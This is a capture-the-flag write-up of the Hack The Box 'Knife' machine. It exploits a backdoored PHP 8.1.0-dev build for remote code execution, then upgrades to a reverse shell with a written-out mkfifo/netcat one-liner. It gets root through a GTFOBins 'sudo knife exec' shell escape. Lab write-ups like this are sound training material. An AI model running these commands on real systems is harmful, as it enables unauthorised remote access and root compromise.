Knife writeup HTB

Knife

An easy machine on a vulnerable php version and a simple privilege escalation by abusing a binary with sudo privileges.

Discovery

Web server

We are presented with some sort of hospital website :

Before even enumerating the website (to look for hidden directories or files with tools like gobuster or dirbuster), I like to check the results of the brower extension called Wappalyser. This extension uncovers the resources (such as frameworks, bootstraps, languages or CMS) behind the creation of a website. Using it on this server uncovers this :

PHP is a server-side scripting language made for web development. Since we are given the exact version of PHP used on this website, I’ll snoop around a little more by checking the source code to see if we can uncover any other useful information. Googling “php version 8.1.0 exploit” reveals a remote code execution vulnerability :

https://www.exploit-db.com/exploits/49933

This is an exploit for the php 1.8.0-dev version. It appears the early launch of this version was implemented with a backdoor (accessed by sending a custom “User-Agentt” header in the request). Luckily for us, this version matches ours by digging a little deeper into the requests/responses of the website:

Shell as james

Running the exploit mentionned before gives us a shell on the machine as james :

However, this shell absolutely sucks. The commands made aren’t kept track of (switching to a directory and and trying to list the contents afterwards doesn’t work, it just brings me back to the / directory). This means I have to chain my commands together to see proper output :

Upgrading the shell with the python pty module doesn’t even work. This is quite annoying, so let’s switch to more stable shell with a reverse shell. A reverse shell opens a remote connection to a destination on a specific port (basically). 

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Let’s choose a payload, execute it on the target machine with our IP and a port of our choice. Before the execution, we’ll start a listener with netcat to catch the incoming session.

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f    –> On the machine (example)

catch it with netcat with : nc -lvnp <PORT>

Now, upgrading our shell with the pty module works! We are now able to execute commands and see their output with ease, which will make the privilege escalation part of our challenge easier.

Privilege escalation

Before even importing a privilege escaltion script, I always run sudo -l to see if our user can run any commands as root.

The user james can run the knife binary (hence the machine name Knife) as root without the need to provide a password! This means we can use the knife command as root. Searching this on GTFObins (a very useful website which details how binaries with different permissions can be used to bypass security elements), we find a one liner in which knife grants us a shell. Since we are running knife as root, the shell that spawns will naturally belong to root.

sudo knife exec -E 'exec "/bin/sh"'